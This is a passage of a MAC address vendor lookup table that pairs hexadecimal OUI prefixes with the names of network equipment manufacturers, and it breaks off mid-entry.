+001557 Olivetti +00155C Dresser Wayne +00154B Wonde Proud Technology +001550 Nits Technology +001545 Seecode +00153E Q-Matic Sweden AB +0015BC Develco +0015B5 CI Network +0015B0 Autotelenet +0015AB PRO Sound +0015A6 Digital Electronics Products +00159F Terascala +001532 Consumer Technologies Group +001539 Technodrive srl +00152B Cisco Systems +00152D TenX Networks +00152C Cisco Systems +00151F Multivision Intelligent Surveillance (Hong Kong) +00151A Hunter Engineering Company +001515 Leipold+Co.GmbH +001510 Techsphere +001453 Advantech Technologies +00144E Srisa +001442 Atto +001449 Sichuan Changhong Electric +00143D Aevoe +00143C Rheinmetall Canada +00143B Sensovation AG +001436 Qwerty Elektronik AB +0014AB Senhai Electronic Technology +0014B0 Naeil Community +0014A9 Cisco Systems +0014AA Ashly Audio +00149D Sound ID +001498 Viking Design Technology +00148A Elin Ebg Traction Gmbh +001491 Daniels Electronics dbo Codan Rado Communications +001485 Giga-Byte +00147E InnerWireless +001477 Nertec +001472 China Broadband Wireless IP Standard Group +001466 Kleinhenz Elektronik GmbH +00146B Anagran +00145F Aditec +001458 HS Automatic ApS +0014E6 AIM Infrarotmodule GmbH +0014E0 LET'S +0014D4 K Technology +0014D9 IP Fabrics +0014CD DigitalZone +0014C1 U.S. Robotics +0014C6 Quixant +0014BA Carvers SA de CV +0014B5 Physiometrix +0013C7 Ionos +0013C0 Trix Tecnologia Ltda. +0013B6 Sling Media +0013AF Numa Technology +0013B0 Jablotron +0013AA ALS & TEC +0013A3 Siemens Com CPE Devices +00139E Ciara Technologies +001502 Beta Tech +001509 Plus Technology +0014FD Thecus Technology +0014EF TZero Technologies +0014F1 Cisco Systems +0014F0 Business Security OL AB +0014EA S Digm (Safe Paradigm) +0014E5 Alticast +001423 J-S Neurocom +001419 Sidsa +001412 S-TEC electronics AG +001409 Magneti Marelli S.E. +00140A Wepio +0013FD Nokia Danmark A/S +0013F8 Dex Security Solutions +0013F1 Amod Technology +0013F7 SMC Networks +0013E7 Halcro +0013DB Shoei Electric +0013CC Tall Maple Systems +001284 Lab33 Srl +00127E Digital Lifestyles Group +001277 Korenix Technologies +001272 Redux Communications +001271 Measurement Computing +00126B Ascalade Communications Limited +001264 daum electronic gmbh +00125A Microsoft +00125F Awind +001255 NetEffect Incorporated +00124E XAC Automation +001242 Millennial Net +001236 ConSentry Networks +00123B KeRo Systems ApS +001368 Saab Danmark A/S +00135C OnSite Systems +001355 Tomen Cyber-business Solutions +001356 Flir Radiation +001350 Silver Spring Networks +001344 Fargo Electronics +001343 Matsushita Electronic Components (Europe) GmbH +00133D Micro Memory Curtiss Wright +00138B Phantom Technologies +001390 Termtek Computer +001376 Tabor Electronics +00137B Movon +001382 Cetacea Networks +001387 27M Technologies AB +00136F PacketMotion +001375 American Security Products +001363 Verascape +0012FA THX +001301 IronGate S.L. +001307 Paravirtual +0012F5 Imarda New Zealand Limited +0012EB PDH Solutions +0012DE Radio Components Sweden AB +0012DD Shengqu Information Technology (Shanghai) +0012E4 Ziehl Industrie-electronik Gmbh + KG +0012AF Elpro Technologies +0012A8 intec GmbH +0012A2 Vita +0012A1 BluePacket Communications +00129C Yulinet +001290 Kyowa Electric & Machinery +001295 Aiware +00132A Sitronics Telecom Solutions +001331 CellPoint Connect +001336 Tianjin 712 Communication Broadcasting +001324 Schneider Electric Ultra Terminal +001314 Asiamajor +001319 Cisco Systems +00131A Cisco Systems +00130D Galileo Avionica +001308 Nuvera Fuel Cells +00122F Sanei Electric +001235 Andrew +00122B Virbiage +001212 Plus +0012D8 International Games System +0012CB CSS +0012C5 V-Show Technology (China) +0012CC Bitatek +0012B4 Work Microwave GmbH +0012BB Telecommunications Industry Association TR-41 Committee +001206 iQuest (NZ) +00120B Chinasys Technologies Limited +00120C CE-Infosys Pte +0011FF Digitro Tecnologia Ltda +0011FA Rane +0011F0 Wideful Limited +0011EF Conitec Datensysteme GmbH +0011E9 Starnex +001187 Category Solutions +001182 IMI Norgren +001181 InterEnergyLtd +00117B Bchi Labortechnik AG +00116F Netforyou +001168 HomeLogic +00115E ProMinent Dosiertechnik GmbH +001157 Oki Electric Industry +000FB2 Broadband Pacenet (India) Pvt. +000FA5 BWA Technology GmbH +000FB1 Cognio +000FAC Ieee 802.11 +000F9C Panduit +000FA0 Canon Korea Business Solutions +000F97 Avanex +000F8A WideView +000F89 Winnertec System +000F90 Cisco Systems +000FD7 Harman Music Group +000FD1 Applied Wireless Identifications Group +000FD2 EWA Technologies +000FC4 NST +000FCB 3Com +000FBF DGT Sp. z o.o. +000FB8 CallURL +0011DD Fromus TEC. +0011E2 Hua Jung Components +0011CF Thrane & Thrane A/S +0011D6 HandEra +0011D0 Tandberg Data ASA +0011CA Long Range Systems +0011C3 Transceiving System Technology +0011B7 Octalix +0011BE AGP Telecom +0011BD Bombardier Transportation +001105 Sunplus Technology +00110C Atmark Techno +000FF9 Valcretec +000FFA Optinel Systems +000FFF Control4 +000FF1 nex-G Systems Pte.Ltd +000FE4 Pantech +000FEA Giga-Byte Technology +000FE3 Damm Cellular Systems A/S +0011AB Trustable Technology +0011B0 Fortelink +0011A4 JStream Technologies +001198 Prism Media Products Limited +00119D Diginfo Technology +00119E Solectron Brazil +00118E Halytech Mace +001193 Cisco Systems +001152 Eidsvoll Electronics AS +00114F US Digital Television +001149 Proliphix +001142 E-smartcom +00113D KN Soltec +00113C Micronas GmbH +001136 Goodrich Sensor Systems +00112C IZT GmbH +001130 Allied Telesis (Hong Kong) +00111E Epsg (ethernet Powerlink Standardization Group) +00111F Doremi Labs +001112 Honeywell Cmss +001118 BLX IC Design +000F58 Adder Technology Limited +000F52 York Refrigeration, Marine & Controls +000F57 Cablelogic +000F45 Stretch +000F46 Sinar AG +000F4B Oracle +000F37 Xambala Incorporated +000F3F Big Bear Networks +000F3B Fuji System Machines +000F31 Allied Vision Technologies Canada +000F32 Lootom Telcovideo Network Wuxi +000F2B Greenbell Systems +000E98 HME Clear-Com +000E93 Milnio 3 Sistemas Electrnicos +000E8C Siemens AG A&D ET +000E86 Alcatel North America +000E80 Thomson Technology +000E85 Catalyst Enterprises +000E74 Solar Telecom. Tech +000E79 Ample Communications +000F24 Cisco Systems +000F12 Panasonic Europe +000F18 Industrial Control Systems +000F11 Prodrive +000F0C Synchronic Engineering +000EFF Megasolution +000F00 Legra Systems +000F05 3B System +000F7D Xirrus +000F84 Astute Networks +000F77 Dentum +000F71 Sanmei Electronics +000F78 Datacap Systems +000F65 icube +000F5E Veo +000E71 Gemstar Technology Development +000E6C Device Drivers Limited +000E65 TransCore +000E5F activ-net GmbH & KG +000E60 360SUN Digital Broadband +000E52 Optium +000E46 Niigata Seimitsu +000E4D Numesa +000E3F Soronti +000EC5 Digital Multitools +000EB8 Iiga +000EB7 Knovative +000EBE B&B Electronics Manufacturing +000EB2 Micro-Research Finland Oy +000EAB Cray +000EA5 Blip Systems +000E9F Temic SDS Gmbh +000E0A Sakuma Design Office +000E12 Adaptive Micro Systems +000E04 CMA/Microdialysis AB +000DF7 Space Dynamics Lab +000DFE Hauppauge Computer Works +000DF1 Ionix +000DEB CompXs Limited +000DF2 Private +000DE4 Diginics +000EF9 REA Elektronik GmbH +000EF2 Infinico +000EE0 Mcharge +000EDF PLX Technology +000EE6 Adimos Systems +000ECA Wtss +000ED1 Osaka Micro Computer. +000EDA C-tech United +000ED6 Cisco Systems +000E37 Harms & Wende GmbH &KG +000E38 Cisco Systems +000E31 Olympus Soft Imaging Solutions GmbH +000E2A Private +000E25 Hannae Technology +000E18 MyA Technology +000E17 Private +000E0E ESA elettronica +000C7E Tellium Incorporated +000C86 Cisco Systems +000C81 Schneider Electric (Australia) +000C72 Tempearl Industrial +000C79 Extel Communications P/L +000C66 Pronto Networks +000C6B Kurz Industrie-Elektronik GmbH +000C6D Edwards +000DDF Japan Image & Network +000DD2 Simrad Optronics ASA +000DD1 Stryker +000DD8 BBN +000DCC Neosmart +000DBF TekTone Sound & Signal Mfg. +000DC0 Spagat AS +000DC5 EchoStar Global B.V. +000DB9 PC Engines GmbH +000D8C Shanghai Wedone Digital +000D8B T&D +000D85 Tapwave +000D86 Huber + Suhner AG +000D7E Axiowave Networks +000D78 Engineering & Security +000D77 FalconStor Software +000D6B Mita-Teknik A/S +000D65 Cisco Systems +000D5F Minds +000D66 Cisco Systems +000CB1 Salland Engineering (Europe) BV +000CB7 Nanjing Huazhuo Electronics +000CBE Innominate Security Technologies AG +000CC3 BeWAN systems +000CB2 Union +000CA5 Naman NZ +000CAC Citizen Watch +000C94 United Electronic Industries, (EUI) +000C99 Hitel Link +000CA0 StorCase Technology +000C8D Matrix Vision Gmbh +000C92 WolfVision Gmbh +000D32 DispenseSource +000D31 Compellent Technologies +000D25 Sanden +000D1F AV Digital +000D19 Robe Show Lighting +000D20 Asahikasei Technosystem +000D0D ITSupported +000D12 Axell +000DB2 Ammasso +000DAD Dataprobe +000D9E Tokuden Ohizumi Seisakusyo +000DA5 Fabric7 Systems +000D99 Orbital Sciences; Launch Systems Group +000D58 Private +000D4C Outline Electronics +000D53 Beijing 5w Communication +000D3F VTI Instruments +000D44 Audio BU - Logitech +000D38 Nissin +000CD1 Sfom Technology +000CD6 Partner Tech +000CDD AOS technologies AG +000CCA Hgst a Western Digital Company +000CC4 Tiptel AG +000D00 Seaway Networks +000D06 Compulogic Limited +000CFA Digital Systems +000CFF Mro-tek Limited +000CED Real Digital Media +000CEE jp-embedded +000CF3 Call Image SA +000CE7 MediaTek +000CE3 Option International N.V. +000B01 Daiichi Electronics +000AF0 Shin-oh Electronics, R&D +000AF5 Airgo Networks +000AEC Koatsu Gas Kogyo +000AE5 ScottCare +000AE7 Eliop +000AE0 Fujitsu Softek +000AC8 Zpsys,ltd. (planning&management) +000ACD Sunrich Technology Limited +000AD4 CoreBell Systems +000B5E Audio Engineering Society +000B63 Kaleidescape +000B55 ADInstruments +000B5A HyperEdge +000B52 Joymax Electronics +000B4D Emuzed +000B41 Ing. Bro Dr. Beutlhauser +000B46 Cisco Systems +000B33 Vivato Technologies +000B3A QuStream +000B3F Anthology Solutions +000B95 eBet Gaming Systems +000B8F Akita Electronics Systems +000B89 Top Global Technology +000B8E Ascent +000B90 Adva Optical Networking +000B7D Solomon Extreme International +000B82 Grandstream Networks +000B6F Media Streaming Networks +000B76 ET&T Technology +000AC1 Futuretel +000AC6 Overture Networks. +000AAE Rosemount Process Analytical +000AB3 Fa. Gira +000AB5 Digital Electronic Network +000ABA Arcon Technology Limited +000AA2 Systek +000AA7 FEI Electron Optics +000A8F Aska International +000A94 ShangHai cellink +000C4E Winbest Technology +000C53 Private +000C5A IBSmm Embedded Electronics Consulting +000C5F Avtec +000C47 SK Teletech(R&D Planning Team) +000C4C Arcor AG&Co. +000C3E Crest Audio +000C37 Geomation +000C2D FullWave Technology +000C1A Quest Technical Solutions +000C1E Global Cache +000C23 Beijing Lanchuan Tech. +000C0E XtremeSpectrum +000C15 CyberPower Systems +000C09 Hitachi IE Systems +000BD3 cd3o +000BC7 Icet +000BCE Free2move AB +000BC2 Corinex Communication +000BBB Etin Systems +000BC0 China Iwncomm +000BAF Wooju Communications +000BB4 RDC Semiconductor +000BA5 Quasar Cipta Mandiri +000BAA Aiphone +000B9E Yasing Technology +000B27 Scion +000B1B Systronix +000B20 Hirata +000B22 Environmental Systems and Services +000B14 ViewSonic +000B0D Air2U +000B0F Bosch Rexroth +000B08 Pillar Data Systems +000AFC Core Tec Communications +000BF6 Nitgen +000BFB D-NET International +000C02 ABB Oy +000BEA Zultys Technologies +000BEF Code +000BE3 Key Stream +000BE8 Aoip +000BE9 Actel +000BD7 Dorma Time + Access Gmbh +000BDC Akcp +000994 Cronyx Engineering +000999 CP Georges Renault +000987 Nishi Nippon Electric Wire & Cable +000988 Nudian Electron +00098D Velocity Semiconductor +000981 Newport Networks +000975 fSONA Communications +00097A Louis Design Labs. +000968 Technoventure +000962 Sonitor Technologies AS +000A9B TB Group +000A9A Aiptek International +000A80 Telkonet +000A82 Tatsuta System Electronics +000A87 Integrated Micromachines +000A7B Cornelius Consult +000A6D EKS Elektronikservice GmbH +000A6F ZyFLEX Technologies +000A74 Manticom Networks +000A61 Cellinx Systems +0009C3 Netas +0009B9 Action Imaging Solutions +0009BA Maku Informationstechik Gmbh +0009AC Lanvoice +0009B3 MCM Systems +0009A7 Bang & Olufsen A/S +00099A Elmo Company, Limited +0009A0 Microtechno +0009ED CipherOptics +0009F2 Cohu,, Electronics Division +0009E6 Cyber Switching +0009E0 Xemics +0009DA Control Module +0009DF Vestel Komunikasyon Sanayi ve Ticaret A.S. +0009CD Hudson Soft +0009C7 Movistec +0009CE SpaceBridge Semiconductor +0009D3 Western DataCom +000901 Shenzhen Shixuntong Information & Technoligy +0008FC Gigaphoton +0008F9 Artesyn Embedded Technologies +0008F4 Bluetake Technology +0008EB Romwin +0008E4 Envenergy +0008DF Alistel +0008D8 Dowkey Microwave +0008D2 Zoom Networks +0008CC Remotec +0008D1 Karel +000967 Tachyon +00096E Giant Electronics +00095E Masstech Group +000959 Sitecsoft +00094D Braintree Communications +000952 Auerswald GmbH & KG +000946 Cluster Labs GmbH +000940 Agfeo Gmbh & KG +00093F Double-Win Enterpirse +000933 OphitLtd. +000A5C Carel +000A50 Remotek +000A55 Markem +000A4E Unitek Electronics +000A42 Cisco Systems +000A49 F5 Networks +000A36 Synelec Telecom Multimedia +000A3B GCT Semiconductor +000A3D Elo Sistemas Eletronicos +000A2F Artnix +000927 Toyokeiki +00092E B&Tech System +000920 Epox Computer +00091B Digital Generation +000914 Computrols +00090E Helix Technology +000908 VTech Technology +00090D Leader Electronics +000A20 SVA Networks +000A25 Ceragon Networks +000A14 Teco a.s. +000A19 Valere Power +000A0D FCI Deutschland GmbH +000A12 Azylex Technology +0009F9 ART Japan +0009FC Ipflex +000A03 Endesa Servicios +000705 Endress & Hauser GmbH & +0006F8 The Boeing Company +0006FF Sheba Systems +0006FD Comjet Information Systems +0006E7 Bit Blitz Communications +0006ED Inara Networks +0006DC Syabas Technology (Amquest) +0006E1 Techno Trade s.a +0006E6 DongYang Telecom +0006CF Thales Avionics In-Flight Systems +0006D6 Cisco Systems +0006D5 Diamond Systems +0006C9 Technical Marketing Research +0007B1 Equator Technologies +0007B8 Corvalent +0007B2 Transaccess +0007A4 GN Netcom +0007AA Quantum Data +00079D Musashi +00079E Ilinx +000774 GuangZhou Thinker Technology +000791 International Data Communications +000798 Selea SRL +000797 Netpower +00078B Wegener Communications +000785 Cisco Systems +00077B Millimetrix Broadband Networks +000856 Gamatronic Electronic Industries +00082D Indus Teqsite Private Limited +000821 Cisco Systems +000814 TIL Technologies +00081A Sanrad Intelligence Storage Communications (2000) +00080F Proximion Fiber Optics AB +000809 Systemonic AG +000803 Cos Tron +0007FF Gluon Networks +0007F9 Sensaphone +000894 InnoVISION Multimedia +00088F Advanced Digital Technology +000888 Oullim Information Technology +000882 Sigma +00087C Cisco Systems +000875 Acorp Electronics +000870 Rasvia Systems +00086F Resources Computer Network +000869 Command-e Technology +000863 Entrisphere +00085D Aastra +000862 NEC Eluminant Technologies +000850 Arizona Instrument +000738 Young Technology +00073F Woojyun Systec +00072C Fabricom +000733 Dancontrol Engineering +000732 Aaeon Technology +000716 J & S Marine +00071B Cdvi Americas +000722 The Nielsen Company +00070A Unicom Automation +00070F Fujant +000709 Westerstrand Urfabrik AB +000702 Varian Medical Systems +0006F3 AcceLight Networks +0006C3 Schindler Elevator +0006C8 Sumitomo Metal Micro Devices +0006BF Accella Technologies +0006B9 A5TEK +0006B2 Linxtek +0006AC Intersoft +0006A6 Artistic Licence Engineering +0006A2 Microtune +000695 Ensure Technologies +00069C Transmode Systems AB +000696 Advent Networks +0007F3 Thinkengine Networks +0007EC Cisco Systems +0007F2 IOA +0007E6 edgeflow Canada +0007E0 Palm +0007D9 Splicecom +0007DA Neuro Telecom +0007D3 Spgprints +0007CA Creatix Polymedia Ges Fur Kommunikaitonssysteme +0007C4 Jean +0007BE DataLogic SpA +00077E Elrest GmbH +00076F Synoptics Limited +00076E Sinetica Limited +00076A Nexteye +00075E Ametek Power Instruments +000765 Jade Quantum Technologies +000764 YoungWoo Telecom +000757 Topcall International AG +000758 Dragonwave +000752 Rhythm Watch +00074B Daihen +000745 Radlan Computer Communications +0008C2 Cisco Systems +0008BB NetExcell +0008B5 TAI Guen Enterprise +0008B6 RouteFree +0008AF Novatec +0008A9 SangSang Technology +0008A8 Systec +0008A3 Cisco Systems +00089C Elecs Industry +000690 Euracom Communication GmbH +00068F Telemonitor +000689 yLez Technologies Pte +000683 Bravara Communications +00D0B9 Microtek International +00067D Takasago +000675 Banderacom +000679 Konami +000663 Human Technology +00066F Korea Data Systems +000662 MBM Technology +000669 Datasound Laboratories +00055A Power Dsine +00065C Malachite Technologies +000610 Abeona Networks +000616 Tel Net +00060A Blue2space +000604 @Track Communications +00CBBD Cambridge Broadband Networks +000603 Baker Hughes +A06A00 Verilink +0005F5 Geospace Technologies +000601 Otanikeiki +0005E8 TurboWave +0005F4 System Base +0005FB ShareGate +0005DB PSI Nentec GmbH +0005DF Electronic Innovation +0005CF Thunder River Technologies +0005C9 LG Innotek +0005D5 Speedcom Wireless +0005BC Resource Data Management +0005C2 Soronti +0005B0 Korea Computer Technology +00059C Kleinknecht GmbH, Ing. Bro +0005B6 Insys Microelectronics Gmbh +0005A2 Celox Networks +0005AC Northern Digital +0004E5 Glonet Systems +0004D9 Titan Electronics +0004D3 Toyokeiki +0004CC Peek Traffic +0004C0 Cisco Systems +0004B9 S.I. Soubou +0004BA KDD Media Will +0004AF Digital Fountain +0004B4 Ciac +0004B3 Videotek +0004A6 SAF Tehnika +0004A0 Verity Instruments +00050C Network Photonics +000512 Zebra Technologies +000506 Reddo Networks AB +0004FC Stratus Computer (DE) +0004F6 Amphus +0004F5 SnowShore Networks +0004E9 Infiniswitch +0004F0 International Computers +0004EF Polestar +0004DF Teracom Telematica Ltda. +000553 DVC Company +000548 Disco +00054D Brans Technologies +000542 Otari +00053C Xircom +00052F Leviton Network Solutions +00053B Harbour Networks, Beijing +000535 Chip PC +000529 Shanghai Broadan Communication Technology +000523 AVL List GmbH +000522 LEA*D +00051C Xnet Technology +000516 Smart Modular Technologies +000650 Tiburon Networks +000656 Tactel AB +00062D TouchStar Technologies +000649 3M Deutschland GmbH +000643 Sono Computer +00064A Honeywell, (korea) +00063F Everex Communications +000639 Newtec +000633 Cross Match Technologies GmbH +000626 MWE GmbH +00061D MIP Telecom +000623 MGE UPS Systems France +000589 National Datacomputer +000595 Alesis +00058F CLCsoft +000596 Genotech +00057D Sun Communications +00057C RCO Security AB +000583 ImageCom Limited +000573 Cisco Systems +000572 Deonet +00056C Hung Chang +000566 Secui.com +000560 Leader Comm.co. +000559 Intracom +0004A5 Barco Projection Systems NV +000499 Chino +00048D Teo Technologies +000493 Tsinghua Unisplendour +000484 Amann GmbH +00048A Temia Vertriebs GmbH +00047A Axxessit ASA +000474 Legrand +00046E Cisco Systems +000473 Photonex +000467 Wuhan Research Institute of MII +000461 Epox Computer +0003D9 Secheron SA +0003D2 Crossbeam Systems +0003CD Clovertech +0003CA MTS Systems +0003C6 Icue Systems +0003BF Centerpoint Broadband Technologies +0003BA Oracle +0003AF Paragea Communications +0003B4 Macrotek International +0003AC Fronius Schweissmaschinen +0003A8 Idot Computers +0003A1 Hiper Information & Communication +000399 Dongju Informations & Communications +00039C OptiMight Communications +000390 Digital Video Communications +000395 California Amplifier +000380 SSH Communications Security +000374 Control Microsystems +0002F0 AME Optimedia Technology +000379 Proscend Communications +000371 Acomz Networks +00036D Runtop +0002E3 Lite-on Communications +0002DE Astrodesign +0002DB Netsec +0002D7 Empeg +0002D2 Workstation AG +000223 ClickTV +0002CB TriState +0002C4 Vector International Bvba +0002BF dotRocket +0002BB Continuous Computing +0002BC LVL 7 Systems +0002B6 Acrosser Technology +0002AF TeleCruz Technology +0002AA PLcom +00045B Techsan Electronics +00044E Cisco Systems +00044F Schubert System Elektronik Gmbh +000454 Quadriga UK +000445 LMS Skalar Instruments GmbH +00044A iPolicy Networks +000444 Western Multiplex +00043E Telencomm +000432 Voyetra Turtle Beach +000437 Powin Information Technology +00042B IT Access +000361 Widcomm +00035A Photron Limited +000355 TeraBeam Internet Systems +000353 Mitac +00034F Sur-Gard Security +00034A Rias +000346 Hitachi Kokusai Electric +000344 Tietech.Co. +000343 Martin Professional A/S +000334 Newport Electronics +000337 Vaone +00033C Daiden +000329 F3 +000330 Imagenics +000321 Reco Research +000324 Sanyo Consumer Electronics +00031B Cellvision Systems +0001A8 Welltech Computer +00030F Digital China (Shanghai) Networks +000314 Teleware Network Systems +00030C Telesoft Technologies +000308 AM Communications +0002FC Cisco Systems +000301 Exfo +0002F9 Mimos Berhad +0002F5 Vive Synergies +0002EA Focus Enhancements +000269 Nadatel +000265 Virditech +00025E High Technology +000261 Tilgin AB +000259 Tsann Kuen China (Shanghai)Enterprise, IT Group +000255 IBM +000249 Aviv Infocom +000250 Geyser Networks +000242 Videoframe Systems +000244 Surecom Technology +00022C ABB Bomem +00023A ZSK Stickmaschinen GmbH +000425 Atmel +000419 Fibercycle Networks +00041A Ines Test and Measurement GmbH & CoKG +000414 Umezawa Musen Denki +000407 Topcon Positioning Systems +0003F7 Plast-Control GmbH +0003FE Cisco Systems +0003FD Cisco Systems +000401 Osaki Electric +0003F0 Redfern Broadband Networks +0003EB Atrica +0003E5 Hermstedt SG +0002A3 ABB Switzerland, Power Systems +000298 Broadframe +000292 Logic Innovations +00028D Movita Technologies +000283 Spectrum Controls +000277 Cash Systemes Industrie +00027C Trilithic +000275 Smart Technologies +000270 Crewave +000104 Dvico +000110 Gotham Networks +00010C System Talks +000113 Olympus +000100 Equip'trans +00B0AC Siae-microelettronica +00B017 InfoGear Technology +0030F0 Uniform Industrial +00B080 Mannesmann Ipulsys +00B09A Morrow Technologies +00B091 Transmeta +0030BE City-Net Technology +000233 Mantra Communications +00022F P-Cube +000227 ESD Electronic System Design GmbH +00021F Aculab PLC +00021B Kollmorgen-Servotronix +00020C Metro-Optix +000218 Advanced Scientific +000213 S.d.e.l. +00020F Aatr +0001F9 TeraGlobal Communications +000200 Net & Sys +0001FC Keyence +0001F3 QPS +0001E4 Sitera +0001EB C-COM +0001F0 Tridium +0001D4 Leisure Time +0001D8 Teltronics +0001C6 Quarry Technologies +0001CC Japan Total Design Communication +0001D1 CoNet Communications +0001B3 Precision Electronic Manufacturing +000160 Elmex +00015E Best Technology +000162 Cygnet Technologies +000169 Celestix Networks Pte +000175 Radiant Communications +000159 S1 +000165 AirSwitch +000171 Allied Data Technologies +000157 Syswave +000153 Archtek Telecom +003038 XCP +0030DB Mindready Solutions +00306A Penta Media +003021 Hsing TECH. Enterprise +0030EA TeraForce Technology +0030F4 Stardot Technologies +003087 Vega Grieshaber KG +003000 Allwell Technology +003034 SET Engineering +00308D Pinnacle Systems +00304B Orbacom Systems +0030FA Telica +0001B1 General Bandwidth +0001BB Frequentis +0001B7 Centos +0001AF Artesyn Embedded Technologies +0001AB Main Street Networks +000191 Syred Data Systems +00019D E-Control Systems +0001A4 Microlink +000199 HeiSei Electronics +0001A0 Infinilink +00017C AG-E GmbH +000188 Lxco Technologies ag +000178 Margi Systems +00018B NetLinks +0030F5 Wild Lab. +000184 Sieb & Meyer AG +00303E Radcom +0030D7 Innovative Systems +0030FC Terawave Communications +00300F IMT - Information Management T +003004 Leadtek Research +003018 Jetway Information +003088 Ericsson +0030CA Discovery Com +00304F Planet Technology +00014B Ennovate Networks +00012C Aravox Technologies +000134 Selectron Systems AG +00013B BNA Systems +000147 Zhone Technologies +00012B Telenet +00011C Universal Talkware +000123 Digital Electronics +00011F RC Networks +003045 Village Networks, (VNI) +0030BB CacheFlow +003053 Basler AG +003072 Intellibyte +0030B1 TrunkNet +0030A7 Schweitzer Engineering +00D086 Foveon +00D05A Symbionics +00D01A Urmet TLC +00D0F3 Solari DI Udine SPA +00D089 Dynacolor +00D08D Phoenix Group +00D09C Kapadia Communications +00D0FE Astral Point +00D0DC Modular Mining Systems +00D062 Digigram +00D0A7 Tokyo Sokki Kenkyujo +00D032 Yano Electric +00D054 SAS Institute +00D0EB Lightera Networks +00D01E Pingtel +00D0A9 Shinano Kenshi +0030E9 GMA Communication Manufact'g +003027 Kerbango +0030F6 Securelogix +0030B6 Cisco Systems +0030B2 L-3 Sonoma EO +0030D6 MSC Vertriebs Gmbh +003008 Avio Digital +00306D Lucent Technologies +0030E4 Chiyoda System Riken +00301A Smartbridges PTE. +0030CD Conexant Systems +003001 SMP +0030E1 Network Equipment Technologies +0050A7 Cisco Systems +00D0EE Dictaphone +00D0B8 Iomega +005045 Rioworks Solutions +00507C Videocon AG +005065 TDK-Lambda +0050F4 Sigmatek Gmbh & KG +005076 IBM +005075 Kestrel Solutions +005090 Dctri +0050ED Anda Networks +005096 Salix Technologies +00509B Switchcore AB +0050A9 Moldat Wireless Technolgies +00503C Tsinghua Novel Electronics +005030 Future Plus Systems +005037 Koga Electronics +00501F MRG Systems +005092 Rigaku Osaka Plant +00501C Jatom Systems +00505C Tundo +005068 Electronic Industries Association +00501A IQinVision +005063 OY Comsel System AB +0050DE Signum Systems +00507B Merlot Communications +005078 Megaton House +00508F Asita Technologies Int'l +005057 Broadband Access Systems +005087 Terasaki Electric +00D03E Rocketchips +00D03F American Communication +00D033 Dalian Daxian Network +00D0CE Asyst Electronic +00D090 Cisco Systems +00D0B6 Crescent Networks +00D0D2 Epilog +0050B6 Good WAY IND. +0050FF Hakko Electronics +005032 Picazo Communications +0050DA 3com +0050F9 Sensormatic Electronics +0050F6 Pan-international Industrial +00506C Beijer Electronics Products AB +0050A5 Capitol Business Systems +005000 Nexo Communications +00D066 Wintriss Engineering +00D06F KMC Controls +00D04B LA CIE Group +00D002 Ditech +00D0A6 Lanbird Technology +00D0DE Philips Multimedia Network +00D083 Invertex +00D038 Fivemere +00D00C Snijder Micro Systems +00D0F2 Monterey Networks +00D07B Comcam International +00D05D Intelliworxx +00D00D Micromeritics Instrument +00D04C Eurotel Telecom +00D0FD Optima Tele.com +0030D8 Sitek +003062 IP Video Networks +003081 Altos C&C +00D0B0 Bitswitch +00D044 Alidian Networks +00D004 Pentacom +00D045 Kvaser AB +00D0D0 Zhongxing Telecom +00902C Data & Control Equipment +009049 Entridia +009043 Tattile SRL +009076 FMT Aircraft Gate Support Systems AB +009017 Zypcom +00907B E-tech +00102A ZF Microsystems +00107D Aurora Communications +00101C OHM Technologies INTL +00106C Ednt Gmbh +0010D4 Storage Computer +0010BF InterAir Wireless +001036 Inter-tel Integrated Systems +001026 Accelerated Networks +00104B 3com +000629 IBM +001004 THE Brantley Coile Company +00103A Diamond Network Tech +0010D8 Calista +001031 Objective Communications +00107E Bachmann Electronic Gmbh +0010C0 ARMA +001016 T.sqware +00103D Phasecom +0010C2 Willnet +00107A AmbiCom +0010C4 Media Global Links +0010EB Selsius Systems +0010FE Digital Equipment +00102E Network Systems & Technologies PVT. +00103E Netschools +001049 ShoreTel +00105E Spirent plc, Service Assurance Broadband +005088 Amano +0050A8 OpenCon Systems +005062 Kouwell Electronics ** +0050B1 Giddings & Lewis +00500C e-Tek Labs +005091 Netaccess +005097 Mmc-embedded Computertechnik Gmbh +0050AF Intergon +0050EB Alpha-top +0050BC Hammer Storage Solutions +0090C3 Topic Semiconductor +0090EC Pyrescom +00903B TriEMS Research Lab +009074 Argon Networks +0090C1 Peco II +0010D3 Grips Electronic Gmbh +0010ED Sundance Technology +001023 Network Equipment Technologies +00104E Ceologic +0010FB Zida Technologies Limited +0010AD Softronics USB +0010D5 Imasde Canarias +0010E5 Solectron Texas +00909D NovaTech Process Solutions +009038 Fountain Technologies +0090C5 Internet Magic +0090AD Aspect Electronics +009097 Sycamore Networks +009008 HanA Systems +0090D4 BindView Development +009089 Softcom Microsystems +0090C4 Javelin Systems +009014 Rotork Instruments +0090B5 Nikon +0090C6 Optim Systems +00909B Markem-imaje +00905B Raymond AND LAE Engineering +0090E8 Moxa Technologies +0090A1 Flying Pig Systems/High End Systems +0090FD CopperCom +0090AC Optivision +00902A Communication Devices +009098 SBC Designs +0090CF Nortel +00900F Kawasaki Heavy Industries +009036 ens +0090E9 Janz Computer AG +009032 Pelcombe Group +0090B8 Rohde & Schwarz Gmbh & KG +0090BE Ibc/integrated Business Computers +009062 ICP Vortex Computersysteme Gmbh +00108F Raptor Systems +001089 WebSonic +001086 Atto Technology +001027 L-3 Communications East +0010B8 Ishigaki Computer System +00104C Teledyne LeCroy +001001 Citel +0010CF Fiberlane Communications +001068 Comos Telecom +001067 Ericsson +0010F1 I-O +001073 Technobox +00E0C0 Seiwa Electric MFG. +00E046 Bently Nevada +00E015 Heiwa +00E065 Optical Access International +00E069 Jaycor +00E05C Panasonic Healthcare +00E087 LeCroy - Networking Productions Division +00E049 Microwi Electronic Gmbh +00E050 Executone Information Systems +00E064 Samsung Electronics +00E012 Pluto Technologies International +00E0D8 Lanbit Computer +00E02D InnoMediaLogic +00E0A9 Funai Electric +00E035 Artesyn Embedded Technologies +00E060 Sherwood +00E0A2 Microslate +00E0CE ARN +00E05F e-Net +00E0C7 Eurotech SRL +00E0C4 Horner Electric +00E04D Internet Initiative Japan +00607F Aurora Technologies +00E039 Paradyne +006091 First Pacific Networks +006002 Screen Subtitling Systems +006061 Whistle Communications +00E0A1 Hima Paul Hildebrandt Gmbh KG +00E028 Aptix +00E0F2 Arlotto Comnet +00E020 Tecnomen OY +00E0C5 Bcom Electronics +00E0EE Marel HF +00E0AC Midsco +00E002 Crossroads Systems +00E057 HAN Microtelecom. +00E0F0 Abler Technology +00E0B7 PI Group +0010B1 For-a +001041 Bristol Babcock +0010F7 